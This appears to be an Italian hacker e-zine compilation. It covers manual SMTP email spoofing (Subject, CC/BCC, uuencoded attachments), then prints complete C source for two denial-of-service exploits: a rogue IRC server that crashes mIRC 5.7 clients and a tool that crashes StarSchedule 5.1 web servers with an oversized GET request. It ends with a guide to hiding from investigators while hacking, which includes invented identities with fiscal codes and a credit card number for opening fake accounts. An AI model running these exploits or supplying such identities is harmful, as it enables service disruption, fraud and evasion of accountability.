In ogni modo, ora che abbiamo richiamato la linea di base del processo di mandare manualmente 
una email, muoviamoci sul soggetto principale di questo manuale.

Il campo del Soggetto senza soggetto
------------------------------------
Ora, poich ho pubblicato il manuale per mandare emails false (Sending emails using SMTP com-
mands) ho ricevuto un numero di emails che mi chiedevano cose del genere: Come specificare il 
soggetto di una email mandata manualmente connettendosi alla porta 25 di un sistema?. O come 
specificare destinatari CC e BCC mentre mentre faccio queste cose? Bene, in questa sezione di-
scutiamo su questo.
Innanzitutto, impariamo come specificare il soggetto di un email lavorando manualmente con i co-
mandi SMTP. Bene, il processo per specificare il soggetto rimane abbastanza simile al normale 
processo di mandare emails manualmente. Attualmente tutti i comandi rimangono gli stessi prima 
che diamo il comando data. Dopo che abbiamo dato il comando data, il server mail remoto ri-
sponder con il seguente messaggio:

***********************************************************************************************
354 Enter mail, end with "." on a line by itself
***********************************************************************************************

Questa risposta del server significa che possiamo cominciare a scrivere il corpo del nostro mes-
saggio. Comunque, specifica anche indirettamente che questo  il momento di scrivere il 
soggetto di una email. Possiamo specificare il soggetto di una email come segue:

***********************************************************************************************
Subject: Hi
***********************************************************************************************

Dove subject:  la parola chiave, che dice al server mail che sei pronto di scrivere nel tuo 
soggetto Hi,  il soggetto a tua scelta. Puoi continuare con il corpo dellemail premendo il 
tasto Invio e scrivendo i caratteri. La fine con il . e tutto rimane lo stesso.
Andiamo attraverso lintero processo, passo dopo passo. Ricorda che ho inserito commenti dove 
necessario nelle parentesi. Sia le parentesi che i caratteri nelle parentesi non sono parte 
degli attuali comandi.
Per questo esempio, abbiamo bisogno di ricordare le seguenti informazioni:

***********************************************************************************************
Server Mail: mail.isp.com
Indirizzo Email del Destinatario: namitas@bol.net.in
Indirizzo Email del Mittente: ankit@bol.net.in
Soggetto: Hi!!!
Testo: This is a test message

C:\windows>telnet mail.isp.com
220 mail.isp.com ESMTP Sendmail 8.9.1 (1.1.20.3/07Jul00-0916AM) Thu, 7 Dec 2000 17:18:50 +0530 
(IST)
helo ankit.com
250-mail.isp.com Hello [203.xx.yyy.91], pleased to meet you
mail from: ankit@bol.net.in
250 ankit@bol.net.in... Sender ok
rcpt to: namitas@bol.net.in
250 namitas@bol.net.in... Recipient ok
data
354 Enter mail, end with "." on a line by itself
subject: Hi!!!
This is a test message
.
250 RAA0000001693 Message accepted for delivery
***********************************************************************************************

Ora se esamini gli headers di questa email, vedrai che oltre agli headers che abbiamo 
analizzato prima, c una linea separata per il Soggetto.

***********************************************************************************************
Return-Path: <ankit@bol.net.in>
Received: from ankit.com by mail.isp.com (8.9.1/1.1.20.3/07Jul00-0916AM)
id RAA0000001693; Thu, 7 Dec 2000 17:19:49 +0530 (IST)
Date: Thu, 7 Dec 2000 17:19:49 +0530 (IST)
From: Ankit Fadia <ankit@bol.net.in>
Message-Id: <200012071149.RAA0000001693@mail.isp.com>
Subject: Hi!!!!
X-UIDL: 920156a3b926c5193036933e6d04efd5

This is a test message
***********************************************************************************************

CC e BCC
--------
Quali sono i comandi SMTP che equivalgono ai campi BCC e CC del tuo client email? Bene, questa 
domanda ha solo una semplice risposta: nessuno. Le seguenti righe ci diranno perch.
Per capire la risposta alla domanda precedente, capiamo prima come esattamente fa un client un 
email a gestire un CC o un BCC. Come fa quando usiamo le funzioni CC e BCC?
Ora, quando premi il comando Send, il tuo client email si connette alla porta 25 del server 
mail che hai specificato nella configurazione. Poi emetter i comandi SMTP al server mail 
remoto e gli mander le informazioni richieste. E con questo processo la tua email  stata 
mandata. Lordine con il quale i vari comandi SMTP sono dati  come descritto precedentemente.
Normalmente, quando hai solo un singolo destinatario, il tuo client email emetter solo un 
singolo RCPT TO: al server mail. Comunque, quando c pi di un solo destinatario, il client 
email emetter pi di un RCPT TO:, o in altre parole, quando il campo CC del tuo client 
email non  vuoto, verranno emessi molti comandi RCPT.
Come vedi il Simple Mail Transfer Protocolo (SMTP) non prevede nessun comando speciale per il 
CC. Il concetto di CC si affida a molti comandi RCPT al server mail. Lo stesso  il caso 
quando hai molti destinatari nel campo To: del client email. Questo significa che non 
importa se aggiungi un indirizzo email del destinatario al campo CC o a To:. Il comando SMTP 
emesso e gli headers creati saranno gli stessi.
Facciamo un esempio pratico per rendere tutto pi chiaro. La lista di destinatari per questo 
esempio  la seguente:


To: ankit@bol.net.in; ankitfadia@hotmail.com 
CC: ankit_Fadia@hotmail.com ; namitas@bol.net.in

Questi sono i comandi che verranno emessi per mandare una email vuota con il soggetto test 
dal seguente indirizzo email: test@bol.net.in alla lista di destinatari sovrariportata.

***********************************************************************************************
C:\windows>telnet mail.isp.com
220 mail.isp.com ESMTP Sendmail 8.9.1 (1.1.20.3/07Jul00-0916AM) Thu, 7 Dec 2000 17:18:50 +0530 
(IST)
helo ankit.com
250-mail.isp.com Hello [203.xx.yyy.91], pleased to meet you
mail from: test@bol.net.in 
250 test@bol.net.in... Sender ok
rcpt to: ankit@bol.net.in
250 ankit@bol.net.in... Recipient ok
rcpt to: ankitfadia@hotmail.com
250 ankitfadia@hotmail.com... Recipient ok
rcpt to: ankit_fadia@hotmail.com
250 ankit_Fadia@hotmail.com... Recipient ok
rcpt to: namitas@bol.net.in
250 namitas@bol.net.in... Recipient ok
data
354 Enter mail, end with "." on a line by itself
subject: Test
.
250 RAA0000001693 Message accepted for delivery
***********************************************************************************************

Chiaro? Ora, vediamo come funziona il BCC.
Ora, nel caso precedente (nel caso di CC), il client email ha usato molti RCPT nella stessa 
sessione SMTP per mandare lo stesso email a molti destinatari. Comunque, in quel caso tutti 
possono vedere la lista dei destinatari. Questo accade perch tutte le email hanno gli stessi 
headers. Questo  dovuto al fatto che gli indirizzi email di tutti i destinatari sono stati 
dati al server mail durante la stessa sessione SMTP. Tutto questo potrebbe sembrare abbastanza 
vago e strano. Se  cos, leggi i seguenti paragrafi per capire meglio.
Ora, quando usi CC per una singola email a molti destinatari (diciamo 3), verr usata la 
seguente procedura:

Il client email fa partire la sessione al server mail remoto.
Presenta se stesso e il mittente.
Usa molti comandi RCPT per mandare la stessa email a molti destinatari.
Il client email si disconnette.

Poich gli indirizzi email dei destinatari sono inseriti nella stessa sessione, si verranno a 
formare gli stessi headers. Cos tutti i destinatari sono capaci di vedere gli indirizzi 
email ai quali  stata mandata questa email.
Ora, in una situazione, quando usiamo BCC per la stessa email verso molti destinatari 
(diciamo 2), verr usata la seguente procedura:

Il client email fa partire la sessione al server mail remoto.
Presenta se stesso e il mittente.
Usa un solo comando RCPT per mandare la stessa email al primo email nella lista BCC.
Il client email si disconnette.
Il client email fa partire unaltra sessione al server mail remoto.
Presenta di nuovo se stesso e il mittente.
Usa un solo comando RCPT per mandare la stessa email al secondo email nella lista BCC.
Il client email si disconnette di nuovo.

In questo caso, a ogni destinatario  stata mandata una email attraverso ununica sessione al 
server remoto, cos ogni destinatario ha ricevuto un header diverso e non sono visualizzati gli 
altri indirizzi email.
La descrizione precedente delluso di CC e di BCC  basata su come funziona Outlook Express. 
Comunque, attualmente Sendmail mette a disposizione un modo per usare i destinatari tramite CC.
Dopo aver dato il comando DATA, si pu dare la lista CC con il seguente comando:

CC:Lista di destinatari

Comunque, dare il comando BCC al posto di CC non produce lo stesso risultato. 

Mandare Attachment con Sendmail
-------------------------------
Oggi, gli attachment [aggiunte, files da aggiungere allemail] MIME sono usati per trasferire i 
files inclusi in una email. Gli attachment MIME usano una codificazione Base64 per cirare i 
dati binari. Precedentemente veniva usato un altro metodo, che era chiamato Uuencode encoding 
standard. Puoi anche mandare attachment attraverso Sendmail usando uno dei seguenti metodi.
La codificazione UU-encoding o Unix-to-Unix  una codificazione standard, che converte tutti i 
tipi di files in ASCII per trasmetterli. I files, che sono mandati attraverso la Rete, sono 
cifrati alla fine del mittente e decifrati alla fine del destinatario. Questo assicura che i 
files (attachment) possono essere trasferiti su diversi tipi di reti, routers di sistema, ecc 
senza perdite. Comunque, questo metodo potrebbe corrompere i files e non  quello che viene 
usato di solito. Secondo ununiversit, il meccanismo di base dellUU-encoding  il seguente:
Lo schema di base  dividere in gruppi di 3 caratteri otto-bit (24 bit) in 4 caratteri sei-bit 
e poi aggiungere 32 (uno spazio) a ogni carattere sei-bit, che lo trascrive nel carattere 
trasmittente. In altre parole, i caratteri a 6 bit cifrati sono trascritti nella 
serie: `!"#$%&'()*+,-./012356789:;<=>?@ABC...XYZ[\]^_ per trasmissioni su linee di 
comunicazione.Ogni cifrazione incremetna la dimensione del file del circa 42%. Cos, il 
meccanismo dellUU-encoding pu essere il seguente:

Il file  uuencoded (cifrato) alla finde del mittente ---------------> Il file  uuencoded alla 
fine del destinatario.

Tutti gli attachment possono essere mandati attraverso la rete in forma uuencode.

Vedi se inserisci il codice Uuencoded di ogni file dopo che hai emesso il comando DATA al 
prompt di Sendmail, il destinatario potr ricevere lattachment e visualizzarlo. La maggior 
parte dei client email permettono lUuencoding. (Anche se il client email usato dal 
destinatario non permette lUuencoding, ci sono molti strumenti che potrebbero farlo.) Tutti i 
files che contendono immagini, file audio, file video, file di testo ecc possono essere 
cifrati dallUuencoding standard per ottenere il codice uuencoded.
Il metodo per mandare attachment cifrati  il seguente:

Convertire il file da mandare come attachment nella forma uuencoded.
Dare la forma uuencoded al server mail dopo il comando DATA.

Ora parliamo del primo passaggio:
Se stai usando una piattaforma Windows, tutto quello che devi avere per usare lUuencoding  
Win-Zip. Se non hai WinZip, puoi scaricarlo da http://www.winzip.com
WinZip pu essere facilmente usato per ottenere lUuencode di tutti i file. Semplicemente 
creando un nuovo archivio contentente il file che vuoi cifrare e selezionare Action > Uuencode.
Puoi anche premere Shift U.
WinZip salver la forma cifrata del file .zip nella forma: filename.uue

Un tipico file .uue (in questo caso di un file di immagine) potrebbe essere il seguente:

***********************************************************************************************
_=_ 
_=_ Part 001 of 001 of file new.zip
_=_ 
begin 666 new.zip
M4$L#!!0``@`(`#5S_RCDJL7+;P```'4````'````;F5W+F=I9G/W=+.P3)1G
MX&%8R``"_T$`Q%#\R<+(P,#(H`/B@.0=F-QZ\INZ%.\\$DX(:]"N_76TM7"V
M:6]\T+)755;)-P(C;UB]*)FR+OSYCGV';_HI7<P)::DQ$Y_Y[%*(UX1`H4U;
M3Z55KVB;<EV#@<$:`%!+`0(4`!0``@`(`#5S_RCDJL7+;P```'4````'````
K````````(`"V@0````!N97<N9VEF4$L%!@`````!``$`-0```)0`````````
`
end
*************************************************************************************************

Le prime righe sono solo commenti aggiunti da WinZip e non fanno parte del codice uuencoded. Co-
s, elimina la parte superiore alla linea:

begin 666 new.zip

Questo ti d il codice Uuencode del file che vuoi trasmettere come attachment usando Sendmail.

####################
VERIT SULLHACKING: Se sei su una piattaforma Unix, creare lUuencode di un file diventa estre-
mamente semplice. Basta andare alla shell Unix per cifrare il file che vuoi mandare. Per fare 
un esempio, diciamo che il file che vuoi mandare  chiamato myfile.doc. Al prompt della shell 
Unix, scrivi:

uuencode myfile.doc myfile.doc > tempfile.uu

Questo dice al comando uuencode di cifrare il file myfile.doc e memorizzare il nome myfile.doc 
nel file cifrato risultante. I risultati sono poi reindirizzati (dal segno >) in un altro file 
che metterai nel tuo messaggio email pi tardi.
Le versioni DOS di questa utility sono reperibili in vari siti.
####################

Ora, una volta che hai cifrato il file e ottenuto la forma Uuencoded, tutto quello che devi 
fare  copiarlo e incollarlo dopo il comando DATA che  stato appena emesso al prompt di 
Sendmail. Questo mander il file come attachment.

Questo era il metodo per mandare un attachment usando lUuencoding standard. Descriver come 
mandare come mandare attachment usando il nuovo MIME standard nella prossima versione di questo
manuale.

Altri suggerimenti su SendMail
------------------------------
Normalmente quando ti connetti alla porta Sendmail di un sistema, hai a disposizione solo i co-
mandi standard di SMTP. Bench sono molti di pi di quelli che hai bisogno, comunque, per 
quelli che vorresti usare con varie opzioni, ci sono altri comandi, che normalmente non ti 
sono disponibili. [questo passo non  molto chiaro, in pratica ci dice che ci sono altri 
comandi carini che purtroppo non possono essere usati da noi].
Quello di cui sto parlando sono i comandi ESMTP o i comandi Extended Mail Transfer Protocol. 
Un server mail con ESMTP abilitato decide se questi comandi ESMTP sono disponibili al client 
sulla base di come il client si presenta a esso. Ora, normalmente ti presenti dando il comando:

HELO dominio

Ora, quando ti presenti il comando HELO, la maggior parte dei server mail mettono a 
disposizione solo i comandi SMTP. Ora, per poter utilizzare i comandi ESMTP, devi presentarti 
al server con il comando EHLO. Per esempio:

ehlo ankit.com

Ora, se il server mail a cui sei connesso ha ESMTP abilitato, ti risponder dando una lista di 
comandi ESMTP. Qualcosa del genere:

***********************************************************************************************
220 mail.isp.com ESMTP Sendmail 8.9.1 (1.1.20.3/07Jul00-0916AM) Thu, 7 Dec2000 17:18:50 +0530 
(IST)
ehlo ankit.com
250-mail.isp.com Hello [203.xx.yy.91], pleased to meet you
250-EXPN
250-VERB
250-8BITMIME
250-SIZE
250-DSN
250-ONEX
250-ETRN
250-XUSR
250 HELP
***********************************************************************************************

####################
VERIT SULLHACKING: Un modo di verificare se il tuo ISP ha i comandi ESMTP abilitati,  vedere 
la risposta del demone che appare quando ti connetti alla porta 25 del suo server mail. La 
parola ESMTP ti dice che tali comandi sono disponibili. Per esempio:

220 mail.isp.com ESMTP Sendmail 8.9.1 (1.1.20.3/07Jul00-0916AM) Thu, 7 Dec2000 17:18:50 +0530 
(IST)
####################



              -!--!--!--!--!--!--!--!--!--!--!--!--!--!--!--!-
              		   MIRC 5.7 DENIAL OF SERVICE EXPLOITS                
              				    		                         sYn  
              ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







/*
diemirc.c - mIRC 5.7 denial of service exploits.
(c) Chopsui-cide/MmM '00


Questo programma si mette in ascolto della porta 6667 per verificate le connessioni in arrivo,
Dopo manda in crash il mIRC usando l'exploit che preferisci.
*/

#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

#define LISTEN_PORT 6667
#define TARGET_NICK "Chopsui-cide"

void listen_sock(int sock, int port);
void die(char *message);
int poll_for_connect(int listensock);
int select_sploit();

void exploit1(int s);
void exploit2(int s);
void exploit3(int s);
void exploit4(int s);

main()
{
	int ls;
	int c;
	if ((ls = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) die("Unable to create socket.");
	c = select_sploit();
	listen_sock(ls, LISTEN_PORT);
	printf("Waiting for connection on port %d...\n", LISTEN_PORT);
	ls = poll_for_connect(ls);
	switch (c)
	{
		case 0 :
			exploit1(ls);
		break;
		case 1 :
			exploit2(ls);
		break;
		case 2 :
			exploit3(ls);
		break;
		case 3 :
			exploit4(ls);
	}
	close(ls);
	return 0;
}

void listen_sock(int sock, int port)
{
	struct sockaddr_in addr;
	int c = 0;

	memset((char *)&addr,'0', sizeof(addr));

	addr.sin_family = AF_INET;
	addr.sin_addr.s_addr = INADDR_ANY;
	addr.sin_port = htons(port);

	if (bind(sock, &addr, sizeof(addr)) == -1) die("Error binding socket.");
	if (listen(sock, 20) == -1) die("Error listening.");
}

void die(char *message)
{
	printf("Fatal error: %s\n", message);
	exit(1);
}

int poll_for_connect(int listensock)
{
	struct sockaddr_in peer;
	int sendsock;
	int szpeer = sizeof(peer);
	do
	{
		sendsock = accept(listensock, (struct sockaddr *) &peer, &szpeer);
	} while(sendsock == -1);
	printf("Connection from [%s].\n", inet_ntoa(peer.sin_addr));
	return sendsock;
}

#define last_select 3
int select_sploit()
{
	char k;
	printf("Select exploit:\n0 - incomplete nick change.\n");
	printf("1 - msg with loads of parameters.\n2 - incomplete mode change.\n");
	printf("3 - incomplete kick.\n");
	k = getchar();
	if (atoi((char *)&k) > last_select)
	{
		printf("Invalid selection.\n");
		exit(1);
	}
	if (((int)k < 0x30) || ((int)k > 0x39))
	{
		printf("Invalid selection.\n");
		exit(1);
	}
	return atoi((char *)&k);
}

/*
Exploit 1: incomplete nick change
mIRC 5.7 and past versions seem to suffer from bugs
involving incomplete messages. I previously e-mailed
Khaled M. Bey about one such bug, and it's fixed in
this version, but there are other similiar (almost
identical) bugs still in v5.7.
This attack is executed from the _server_ side.
All we need to do is send the client a half complete
nick change message, ie
":<targetnick>!ident@host.com NICK"
We must put the target's current nick name where
<targetnick> is.
*/
#define END "!ident@host.com NICK\x0a"
void exploit1(int s)
{
	char sod[256];
	memset((char *)&sod, '\0', 256);
	sod[0] = ':';
	strcat(sod, TARGET_NICK);
	strcat(sod, END);
	send(s, sod, 256, 0);
	usleep(1000); // Make sure the packet gets there.
}

/*
Exploit 2: server message overflow
If the client sends a large message with to many
parameters, it crashes, and part of the buffer is
stuffed into EAX.
*/
#define MSG_LEN 1000 // This must be an even number.
void exploit2(int s)
{
	char sod[MSG_LEN];
	int c = 0;
	do
	{
		sod[c] = 0xff;
		sod[c + 1] = ' ';
		c += 2;
	} while(c < MSG_LEN);
	send(s, sod, MSG_LEN, 0);
	usleep(1000); // Make sure the packet gets there.
}

/*
Exploit 3: incomplete mode change
This is basically the same as the nick change
exploit.
*/
#define ENDd "!ident@host.com MODE\x0a"
void exploit3(int s)
{
	char sod[256];
	memset((char *)&sod, '\0', 256);
	sod[0] = ':';
	strcat(sod, TARGET_NICK);
	strcat(sod, ENDd);
	send(s, sod, 256, 0);
	usleep(1000); // Make sure the packet gets there.
}

/*
Exploit 4: incomplete kick
Another incomplete message bug.
*/
#define JOIN " JOIN #\x0a"
#define KICK ": KICK #\x0a"
void exploit4(int s)
{
	char sod[256];
	memset((char *)&sod, '\0', 256);
	sod[0] = ':';
	strcat(sod, TARGET_NICK);
	strcat(sod, JOIN);
	printf("%s%s", sod, KICK);
	send(s, sod, strlen(sod), 0);
	send(s, KICK, strlen(KICK), 0);
	usleep(1000); // Make sure the packet gets there.
}






I not modify the program.!




              -!--!--!--!--!--!--!--!--!--!--!--!--!--!--!--!-
              		      STARSCHEDULE 5.1 WEB SERVER DOS                 
              				    		                              
              ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



/* StarSchedule 5.1 Web Server DoS (common on port 801)
 * questo programma  stato scritto da  Michael Stevens
 * 
 *
 * Credits to Microsoft Security Webpage
 * --- Finally and exploit with style and a message
 */

#include <stdio.h>		/* I hope you know this one */
#include <sys/types.h>		/* Socket types */
#include <sys/socket.h>		/* Sockets duh! */
#include <netinet/in.h>		/* Definitions of constants */
#include <netdb.h>		/* gethostbyname */

char crash[] = "GET /\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 
	"\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21"
	"\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21"
	"\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21"
	"\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21"
	"\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21"
	"\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21"
	"\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21"
	"\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21"
	"\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21"
	"\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21"
	"\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21"
	"\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21"
	"\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21"
	"\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21"
	"\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21"
	"\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21"
	"\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21"
	"\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21"
	"\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21"
	"\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21"
	"\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21"
	"\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21"
	"\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21"
	"\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21"
	"\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21"
	"\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21"
	"\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21"
	"\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21"
	"\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21"
	"\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21"
	"\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21"
	"\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21"
	"\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21"
	"\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21"
	"\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21"
	"\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21"
	"\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21"
	"\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21"
	"\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21"
	"\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21"
	"\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21"
	"\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21"
	"\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21"
	"\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21"
	"\x46\x55\x43\x4b\x20\x53\x43\x52\x49\x50\x54\x4b\x49\x44\x44\x49\x45\x53\x2e\x21"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	" HTTP/1.0"; 
 

int main(int argc, char **argv)
{
	struct 		sockaddr_in sin;
	struct 		hostent *pHostentry;
	char 		*tcp_dest;
	int 		sd, a_count = argc;
	unsigned short 	port;
	printf("----Crash StarSchedule 5.1 Server by Michael Stevens----\n");
	printf("\n");

	if (a_count < 3 || a_count > 3)
	{
		printf("usage: %s destination port\n",argv[0]);
		exit(1);
	}

	port = atoi(argv[2]);
	tcp_dest = argv[1];

	if (( port > 65535) || (port < 1)) 
	{
		printf("Port too high or low. Accepted ranges are 1 - 65535\n");
		exit(1);
	}	

	if ((pHostentry = gethostbyname(tcp_dest)) == NULL)
	{
		printf("Resolve failed check provided host information and retry.\n");
		exit(1);
	} 
	printf("Setting up connection structure...\n");	
	memcpy(&sin.sin_addr.s_addr, pHostentry->h_addr, pHostentry->h_length);
	sin.sin_family = AF_INET;
	sin.sin_port = htons(port);

	printf("Read tcp_dest:\t\t %s\n", 	tcp_dest);
	printf("Official Hostname:\t %s\n",	pHostentry->h_name);
	printf("IP Address:\t\t %s\n",		inet_ntoa(sin.sin_addr.s_addr));
	printf("port: \t\t\t %d\n",		port);
	printf("Host length:\t\t %d\n\n",	pHostentry->h_length);
	
	printf("Creating Socket...\n");
	if((sd = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
	{
		printf("Socket problems Quiting...\n");
		exit(1);
	}	

	printf("Got a socket descriptor of %d\n", sd);
	printf("Connecting Socket...\n");
	
	if (connect(sd, (struct sockaddr *)&sin, sizeof(sin)) == -1)
	{	
		printf("Connect error...\n");
		close(sd);
		exit(1);	
	}

	printf("Sending Code...\n");
	send(sd, crash, sizeof(crash), 0);
	printf("Closing Socket...\n");
	close(sd);
	printf("Exiting...\n");		
	return 0;
}


              -!--!--!--!--!--!--!--!--!--!--!--!--!--!--!--!-
              		        MIMETIZZAZIONE TERMO OTTICA                   
              				    		                          sYn 
              ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



: Come nascondersi nella Rete :.


---[ C O N T E N U T i ]---

0x00.0 Anonimato
0x00.1 CLI & BIC
0x00.2 Account falsi
0x00.3 Proxy
0x00.4 Socks
0x00.5 Wingate
0x00.6 Trovare Proxy, Socks & Wingate
0x00.7 Pericoli



0x00.0 ANONIMATO
================
Prima di effettuare qualsiasi operazione e'necessario sapere come nascondersi
nella Rete. Questo non  garantira' l'anonimato completo, ma rendera' piu'
difficile il compito di chi deve trovarci.
In questo articolo, esplicitamente rivolto ai newbbissimi, prenderemo in
considerazione tutti i passaggi di una connessione Internet, dalla chiamata
telefonica ai diversi "rimbalzi" sugli host della rete.
Prima di effettuare qualsiasi tipo di "esperimento" consiglio di leggere
completamente il documento, compresa la sezione "Pericoli".

0x00.1 CLI & BIC
----------------
Dove CLI sta per "Caller Line Identification" e BIC per "Blocco identificazione
chiamante". Chiaramente stiamo parlando del collegamento telefonico. Il primo
passo verso Internet e' la connessione dial-up con l'ISP (Internet Service Provider)
Da alcuni mesi e' disponibile anche in Italia il CLI, ovvero l'invio del numero
del chiamante; questo significa che chi riceve la vostra chiamata e' in grado
di vedere in tempo reale il numero del chiamante.
Per evitare che questo avvenga, e' disponibile il "Blocco identificazione chiamente",
che disabilita (parzialmente) questa possibilita'.
Mettendo il numero 1793 (o *67#) davanti al numero da chiamare, si inibisce
la possibilita' di visualizzare il nostro numero sul display del ricevente,
ma non l'invio dello stesso alla centrale Telecom; questo significa che
comunque sui tabulati della telco sara' registrata la telefonata dalla vostra
utenza all'ISP, quel giorno a quell'ora...

0x00.2 Account falsi
--------------------
Scenario: voi state "hackerando" con l'account dell'abbonamento che vi hanno
regalato; vi siete registrati con il vostro nome (Mario Rossi) e vi siete
collegati al computer del Pentagono... il sysadmin si accorge di un ip strano
collegato al sistema (il vostro ip!), esegue un traceroute sul vostro ip,
prende nota del penultimo hop e si collega sulla porta 79 di quell'host
(il vostro gateway):
users online
---------------
mrossi@tin.it   212.216.200.123
Mezz'ora dopo l'FBI e' a casa vostra e suona il campanello...
Questa storiella ci insegna che non e' buona abitudine hackerare con l'abbonamento
che abbiamo registrato con il nostro nome e i nostri dati anagrafici.
Da quando sono nati i free-internet provider (Libero,Tiscali) la situazione e'
alquanto migliorata (non che prima fosse fosse molto piu' complicata...); si
possono creare fake-account a volonta', utilizzando un generatore di
identita'(tipo quello di Cavallo de Cavallis).
Naturalmente per effettuare l'abbonamento on-line, si dovranno rispettare alcune
regole auree: una l'abbiamo gia' vista, ovvero la "disabilitazione" del CLI
mettendo il numero 1793 prima del numero da chiamare, l'utilizzo di proxy.
Eccovi ad esempio una piccola lista di identita' false:
NOME             Mathias
COGNOME          Ghiringhelli
NATO IL          12 / 7 / 1965
A                Porto Recanati (MC)
RESIDENTE IN     Viale Liberazione 29
                 14036 Moncalvo (AT)
COD. FISCALE N.  GHR MHS 65L12 G919A
CELLULARE N.     (Omnitel Libero) 0347-1743221
CARTA DI CREDITO 4095 1244 6919 7921 (Banca : CARIPLO)
E-MAIL:          mghiringhelli@... 

NOME             Diego
COGNOME          Arrigoni
NATO IL          18 / 5 / 1958
A                Lido di Camaiore (LU)
RESIDENTE IN     Vicolo Adige 11
                 07041 Alghero (SS)
COD. FISCALE N.  RRG DGI 58E18 B455O
